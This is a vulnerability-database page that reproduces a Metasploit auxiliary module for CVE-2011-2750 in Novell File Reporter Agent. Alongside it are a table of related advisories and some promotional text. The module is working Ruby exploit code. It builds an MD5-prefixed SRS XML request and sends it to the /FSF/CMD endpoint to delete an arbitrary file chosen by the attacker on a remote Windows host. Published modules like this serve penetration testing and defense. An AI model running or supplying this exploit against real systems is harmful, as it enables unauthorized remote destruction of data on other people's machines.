Lucene search
K

Novell File Reporter Agent Arbitrary File Delete

🗓️ 13 Sep 2012 15:24:16Reported by Luigi Auriemma, juan vazquez <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 41 Views

Novell File Reporter Agent Arbitrary File Delete via SRS reques

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2011-2750
29 May 201815:50
circl
Check Point Advisories
Novell File Reporter Agent Arbitrary File Delete (CVE-2011-2750)
15 Jan 201300:00
checkpoint_advisories
CVE
CVE-2011-2750
17 Jul 201120:00
cve
Cvelist
CVE-2011-2750
17 Jul 201120:00
cvelist
NVD
CVE-2011-2750
17 Jul 201120:55
nvd
OpenVAS
Novell File Reporter 'SRS' Tag Arbitrary File Deletion Vulnerability
22 Jul 201100:00
openvas
OpenVAS
Novell File Reporter 'SRS' Tag Arbitrary File Deletion Vulnerability
22 Jul 201100:00
openvas
Packet Storm
Novell File Reporter Agent Arbitrary File Delete
31 Aug 202400:00
packetstorm
Packet Storm
📄 NFR Agent 1.0.1 Arbitrary File Delete
5 Feb 202600:00
packetstorm
Packet Storm
📄 NFR Agent 1.0.4.2 Arbitrary File Delete
9 Feb 202600:00
packetstorm
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Novell File Reporter Agent Arbitrary File Delete',
        'Description' => %q{
          NFRAgent.exe in Novell File Reporter allows remote attackers to delete
          arbitrary files via a full pathname in an SRS request with OPERATION set to 4 and
          CMD set to 5 against /FSF/CMD. This module has been tested successfully on NFR
          Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1) on
          Windows platforms.
        },
        'Author' => [
          'Luigi Auriemma', # Vulnerability discovery and Poc
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2011-2750' ],
          [ 'OSVDB', '73729' ],
          [ 'URL', 'http://aluigi.org/adv/nfr_2-adv.txt'],
        ]
      )
    )

    register_options(
      [
        Opt::RPORT(3037),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new('RPATH', [ true, 'The remote file path to delete', 'c:\\test.txt' ]),
      ]
    )
  end

  def run
    peer = "#{rhost}:#{rport}"
    record = "<RECORD><NAME>SRS</NAME><OPERATION>4</OPERATION><CMD>5</CMD><PATH>#{datastore['RPATH']}</PATH></RECORD>"
    md5 = Rex::Text.md5('SRS' + record + 'SERVER').upcase
    message = md5 + record

    print_status("Trying to delete #{datastore['RPATH']}...")

    res = send_request_cgi(
      {
        'uri' => '/FSF/CMD',
        'version' => '1.1',
        'method' => 'POST',
        'ctype' => 'text/xml',
        'data' => message
      }, 5
    )

    if res && (res.code == 200) && res.body =~ (%r{<RESULT><VERSION>1</VERSION><STATUS>0</STATUS><TRANSID>0</TRANSID></RESULT>})
      print_good("File #{datastore['RPATH']} successfully deleted")
    else
      print_error('File not deleted')
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation